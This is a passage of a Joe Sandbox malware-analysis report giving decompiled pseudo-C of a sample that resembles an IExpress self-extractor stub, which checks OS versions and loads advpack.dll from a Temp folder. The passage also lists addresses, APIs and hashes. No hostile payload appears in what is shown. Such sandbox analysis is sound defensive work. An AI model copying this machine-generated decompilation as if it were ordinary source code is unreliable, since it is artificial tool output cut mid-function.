                                                                                                                                                                                                                                            										if(_t138 == 0) {
                                                                                                                                                                                                                                            											goto L66;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t135 = 0;
                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                            										goto L44;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L37:
                                                                                                                                                                                                                                            									_t129 = _v432;
                                                                                                                                                                                                                                            									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                            									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t133 =  &_v268;
                                                                                                                                                                                                                                            									_t104 = E00A928E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                            									__eflags = _t104;
                                                                                                                                                                                                                                            									if(_t104 != 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t135 = _v428;
                                                                                                                                                                                                                                            									_t133 = 0x54d;
                                                                                                                                                                                                                                            									_t138 = 0x54d;
                                                                                                                                                                                                                                            									goto L40;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							if(_t91 > 0) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 != 0) {
                                                                                                                                                                                                                                            								__eflags = _t91;
                                                                                                                                                                                                                                            								if(_t91 != 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                            								__eflags = _t135;
                                                                                                                                                                                                                                            								if(_t135 == 0) {
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t138 = 0x54c;
                                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                            							if(_t91 != 0) {
                                                                                                                                                                                                                                            								_t131 = _v424;
                                                                                                                                                                                                                                            								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                            								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                            							_t109 = _v424;
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                            							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                                            							L33:
                                                                                                                                                                                                                                            							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                            							_v428 = _t135;
                                                                                                                                                                                                                                            							_v420 = _t135;
                                                                                                                                                                                                                                            							__eflags = _t135 - 2;
                                                                                                                                                                                                                                            						} while (_t135 < 2);
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t77 == 1;
                                                                                                                                                                                                                                            					if(_t77 == 1) {
                                                                                                                                                                                                                                            						 *0xa99a40 = _t119;
                                                                                                                                                                                                                                            						 *0xa98184 = 1;
                                                                                                                                                                                                                                            						 *0xa98180 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - 3;
                                                                                                                                                                                                                                            						if(_t133 > 3) {
                                                                                                                                                                                                                                            							__eflags = _t133 - 5;
                                                                                                                                                                                                                                            							if(_t133 < 5) {
                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t113 = 3;
                                                                                                                                                                                                                                            							_t119 = _t113;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t119 = 1;
                                                                                                                                                                                                                                            						_t114 = 3;
                                                                                                                                                                                                                                            						 *0xa99a40 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0xa98184 = _t135;
                                                                                                                                                                                                                                            							 *0xa98180 = _t135;
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                            						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t138 = 0x4ca;
                                                                                                                                                                                                                                            					goto L44;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t138 = 0x4b4;
                                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					L65:
                                                                                                                                                                                                                                            					_t133 = _t138;
                                                                                                                                                                                                                                            					E00A944B9(0, _t138);
                                                                                                                                                                                                                                            					L66:
                                                                                                                                                                                                                                            					return E00A96CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x00a936f9
                                                                                                                                                                                                                                            0x00a93700
                                                                                                                                                                                                                                            0x00a9370c
                                                                                                                                                                                                                                            0x00a93716
                                                                                                                                                                                                                                            0x00a93718
                                                                                                                                                                                                                                            0x00a9371b
                                                                                                                                                                                                                                            0x00a93721
                                                                                                                                                                                                                                            0x00a9372b
                                                                                                                                                                                                                                            0x00a9373d
                                                                                                                                                                                                                                            0x00a93745
                                                                                                                                                                                                                                            0x00a93746
                                                                                                                                                                                                                                            0x00a93746
                                                                                                                                                                                                                                            0x00a93749
                                                                                                                                                                                                                                            0x00a937ab
                                                                                                                                                                                                                                            0x00a937ad
                                                                                                                                                                                                                                            0x00a937ae
                                                                                                                                                                                                                                            0x00a937b3
                                                                                                                                                                                                                                            0x00a937b8
                                                                                                                                                                                                                                            0x00a937b8
                                                                                                                                                                                                                                            0x00a937bf
                                                                                                                                                                                                                                            0x00a937bf
                                                                                                                                                                                                                                            0x00a937c5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a937cb
                                                                                                                                                                                                                                            0x00a937cd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a937d5
                                                                                                                                                                                                                                            0x00a937db
                                                                                                                                                                                                                                            0x00a937e8
                                                                                                                                                                                                                                            0x00a937ea
                                                                                                                                                                                                                                            0x00a937ea
                                                                                                                                                                                                                                            0x00a937ea
                                                                                                                                                                                                                                            0x00a937f0
                                                                                                                                                                                                                                            0x00a937f6
                                                                                                                                                                                                                                            0x00a93805
                                                                                                                                                                                                                                            0x00a93817
                                                                                                                                                                                                                                            0x00a9382b
                                                                                                                                                                                                                                            0x00a93830
                                                                                                                                                                                                                                            0x00a93836
                                                                                                                                                                                                                                            0x00a9383b
                                                                                                                                                                                                                                            0x00a9383d
                                                                                                                                                                                                                                            0x00a938eb
                                                                                                                                                                                                                                            0x00a938eb
                                                                                                                                                                                                                                            0x00a938f2
                                                                                                                                                                                                                                            0x00a9390c
                                                                                                                                                                                                                                            0x00a93911
                                                                                                                                                                                                                                            0x00a93911
                                                                                                                                                                                                                                            0x00a93913
                                                                                                                                                                                                                                            0x00a9394d
                                                                                                                                                                                                                                            0x00a9394d
                                                                                                                                                                                                                                            0x00a9394f
                                                                                                                                                                                                                                            0x00a938a9
                                                                                                                                                                                                                                            0x00a938a9
                                                                                                                                                                                                                                            0x00a938b0
                                                                                                                                                                                                                                            0x00a938b2
                                                                                                                                                                                                                                            0x00a938b9
                                                                                                                                                                                                                                            0x00a938bb
                                                                                                                                                                                                                                            0x00a938c1
                                                                                                                                                                                                                                            0x00a93975
                                                                                                                                                                                                                                            0x00a938c7
                                                                                                                                                                                                                                            0x00a938de
                                                                                                                                                                                                                                            0x00a938e0
                                                                                                                                                                                                                                            0x00a938e0
                                                                                                                                                                                                                                            0x00a9397b
                                                                                                                                                                                                                                            0x00a9397d
                                                                                                                                                                                                                                            0x00a939a9
                                                                                                                                                                                                                                            0x00a9397f
                                                                                                                                                                                                                                            0x00a93982
                                                                                                                                                                                                                                            0x00a9398b
                                                                                                                                                                                                                                            0x00a9398d
                                                                                                                                                                                                                                            0x00a9398f
                                                                                                                                                                                                                                            0x00a9399f
                                                                                                                                                                                                                                            0x00a939a1
                                                                                                                                                                                                                                            0x00a93991
                                                                                                                                                                                                                                            0x00a93991
                                                                                                                                                                                                                                            0x00a93991
                                                                                                                                                                                                                                            0x00a9398f
                                                                                                                                                                                                                                            0x00a939af
                                                                                                                                                                                                                                            0x00a939b6
                                                                                                                                                                                                                                            0x00a93a0f
                                                                                                                                                                                                                                            0x00a93a0f
                                                                                                                                                                                                                                            0x00a93a11
                                                                                                                                                                                                                                            0x00a93a13
                                                                                                                                                                                                                                            0x00a93a19
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a939b8
                                                                                                                                                                                                                                            0x00a939b8
                                                                                                                                                                                                                                            0x00a939ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a939bc
                                                                                                                                                                                                                                            0x00a939bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a939c3
                                                                                                                                                                                                                                            0x00a939c9
                                                                                                                                                                                                                                            0x00a939ce
                                                                                                                                                                                                                                            0x00a939d0
                                                                                                                                                                                                                                            0x00a939e3
                                                                                                                                                                                                                                            0x00a939e5
                                                                                                                                                                                                                                            0x00a939e6
                                                                                                                                                                                                                                            0x00a939f1
                                                                                                                                                                                                                                            0x00a939f7
                                                                                                                                                                                                                                            0x00a939fa
                                                                                                                                                                                                                                            0x00a93a01
                                                                                                                                                                                                                                            0x00a93a04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93a06
                                                                                                                                                                                                                                            0x00a93a09
                                                                                                                                                                                                                                            0x00a93a09
                                                                                                                                                                                                                                            0x00a93a0b
                                                                                                                                                                                                                                            0x00a93a0b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93a09
                                                                                                                                                                                                                                            0x00a939fc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a939fc
                                                                                                                                                                                                                                            0x00a939d3
                                                                                                                                                                                                                                            0x00a939d8
                                                                                                                                                                                                                                            0x00a939da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a939dc
                                                                                                                                                                                                                                            0x00a939b6
                                                                                                                                                                                                                                            0x00a93955
                                                                                                                                                                                                                                            0x00a9395b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93961
                                                                                                                                                                                                                                            0x00a93963
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93969
                                                                                                                                                                                                                                            0x00a93969
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93969
                                                                                                                                                                                                                                            0x00a93915
                                                                                                                                                                                                                                            0x00a93915
                                                                                                                                                                                                                                            0x00a9391b
                                                                                                                                                                                                                                            0x00a9391f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9392d
                                                                                                                                                                                                                                            0x00a93933
                                                                                                                                                                                                                                            0x00a93938
                                                                                                                                                                                                                                            0x00a9393a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93940
                                                                                                                                                                                                                                            0x00a93946
                                                                                                                                                                                                                                            0x00a9394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a938f2
                                                                                                                                                                                                                                            0x00a93843
                                                                                                                                                                                                                                            0x00a93845
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9384b
                                                                                                                                                                                                                                            0x00a9384d
                                                                                                                                                                                                                                            0x00a93883
                                                                                                                                                                                                                                            0x00a93885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9389a
                                                                                                                                                                                                                                            0x00a9389e
                                                                                                                                                                                                                                            0x00a9389e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a938a0
                                                                                                                                                                                                                                            0x00a938a0
                                                                                                                                                                                                                                            0x00a938a2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a938a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a938a4
                                                                                                                                                                                                                                            0x00a9384f
                                                                                                                                                                                                                                            0x00a93851
                                                                                                                                                                                                                                            0x00a93857
                                                                                                                                                                                                                                            0x00a9386e
                                                                                                                                                                                                                                            0x00a93877
                                                                                                                                                                                                                                            0x00a9387b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93881
                                                                                                                                                                                                                                            0x00a93859
                                                                                                                                                                                                                                            0x00a9385c
                                                                                                                                                                                                                                            0x00a93862
                                                                                                                                                                                                                                            0x00a93866
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93868
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a938f4
                                                                                                                                                                                                                                            0x00a938f4
                                                                                                                                                                                                                                            0x00a938f5
                                                                                                                                                                                                                                            0x00a938fb
                                                                                                                                                                                                                                            0x00a93901
                                                                                                                                                                                                                                            0x00a93901
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9390a
                                                                                                                                                                                                                                            0x00a9374b
                                                                                                                                                                                                                                            0x00a9374e
                                                                                                                                                                                                                                            0x00a9375c
                                                                                                                                                                                                                                            0x00a93764
                                                                                                                                                                                                                                            0x00a93769
                                                                                                                                                                                                                                            0x00a9376e
                                                                                                                                                                                                                                            0x00a93771
                                                                                                                                                                                                                                            0x00a9379c
                                                                                                                                                                                                                                            0x00a9379f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a937a3
                                                                                                                                                                                                                                            0x00a937a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a937a4
                                                                                                                                                                                                                                            0x00a93773
                                                                                                                                                                                                                                            0x00a93777
                                                                                                                                                                                                                                            0x00a93778
                                                                                                                                                                                                                                            0x00a9377f
                                                                                                                                                                                                                                            0x00a93781
                                                                                                                                                                                                                                            0x00a9378e
                                                                                                                                                                                                                                            0x00a9378e
                                                                                                                                                                                                                                            0x00a93794
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93794
                                                                                                                                                                                                                                            0x00a93783
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93785
                                                                                                                                                                                                                                            0x00a9378c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9378c
                                                                                                                                                                                                                                            0x00a93750
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9372d
                                                                                                                                                                                                                                            0x00a9372d
                                                                                                                                                                                                                                            0x00a9396b
                                                                                                                                                                                                                                            0x00a9396b
                                                                                                                                                                                                                                            0x00a9396c
                                                                                                                                                                                                                                            0x00a9396e
                                                                                                                                                                                                                                            0x00a9396f
                                                                                                                                                                                                                                            0x00a93a1e
                                                                                                                                                                                                                                            0x00a93a1e
                                                                                                                                                                                                                                            0x00a93a22
                                                                                                                                                                                                                                            0x00a93a27
                                                                                                                                                                                                                                            0x00a93a3e
                                                                                                                                                                                                                                            0x00a93a3e

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A93723
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00A939C3
                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00A939F1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                            • String ID: 3$lenta
                                                                                                                                                                                                                                            • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                            • Opcode ID: 9a6bba05700e2930be552ffcbf9ad897ef89bfb4b3f8ba3da310e9a8380d442d
                                                                                                                                                                                                                                            • Instruction ID: 72ca25b0093826b213ea6c2f3dc6cd66d07a72061314878bf46ebda0ed51e08b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a6bba05700e2930be552ffcbf9ad897ef89bfb4b3f8ba3da310e9a8380d442d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2391F172B012249FEF34CB69CD90BAAB3F1EB45344F1541AAD88ADB251DB718F81CB41
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                            			E00A96495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed char _t14;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                                                                                            				_t18 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				E00A91781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                            				_t26 = "advpack.dll";
                                                                                                                                                                                                                                            				E00A9658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                            				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x00a96495
                                                                                                                                                                                                                                            0x00a96495
                                                                                                                                                                                                                                            0x00a964a0
                                                                                                                                                                                                                                            0x00a964a7
                                                                                                                                                                                                                                            0x00a964ab
                                                                                                                                                                                                                                            0x00a964bd
                                                                                                                                                                                                                                            0x00a964c2
                                                                                                                                                                                                                                            0x00a964d3
                                                                                                                                                                                                                                            0x00a964df
                                                                                                                                                                                                                                            0x00a964e8
                                                                                                                                                                                                                                            0x00a96502
                                                                                                                                                                                                                                            0x00a964ee
                                                                                                                                                                                                                                            0x00a964f9
                                                                                                                                                                                                                                            0x00a964f9
                                                                                                                                                                                                                                            0x00a96516

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00A964DF
                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00A964F9
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00A96502
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                                                            • API String ID: 438848745-3736221019
                                                                                                                                                                                                                                            • Opcode ID: da82aaaca295d776634be7919b061313847335cd09f9da07cf4eeba76de650d7
                                                                                                                                                                                                                                            • Instruction ID: 633a4e4d03d8a2d48ab65d7f1b6a912a0697b6a0294d7cc0377eb5a6513f298e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da82aaaca295d776634be7919b061313847335cd09f9da07cf4eeba76de650d7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC01A470B04108ABDF50EBA4DC49EEE77B8EF65311F50029AF589961D0DF709E8ACA51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A928E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                            				int _v40;
                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                            				long _t68;
                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                                            				_t99 = __ecx;
                                                                                                                                                                                                                                            				_t106 = 0;
                                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				_t103 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_t106 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                            						if(E00A92773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                            						_v28 = _t68;
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_t99 = _v16;
                                                                                                                                                                                                                                            							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                            							_t93 = _v24;
                                                                                                                                                                                                                                            							_t87 = _v20;
                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                            							if(_t103 != 0) {
                                                                                                                                                                                                                                            								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                            								_v36 = _t73;
                                                                                                                                                                                                                                            								if(_t73 != 0) {
                                                                                                                                                                                                                                            									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                            										L15:
                                                                                                                                                                                                                                            										GlobalUnlock(_t103);
                                                                                                                                                                                                                                            										_t99 = _v16;
                                                                                                                                                                                                                                            										L18:
                                                                                                                                                                                                                                            										_t87 = _t87 + 1;
                                                                                                                                                                                                                                            										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										_v20 = _t87;
                                                                                                                                                                                                                                            										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L19;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t79 = _v44;
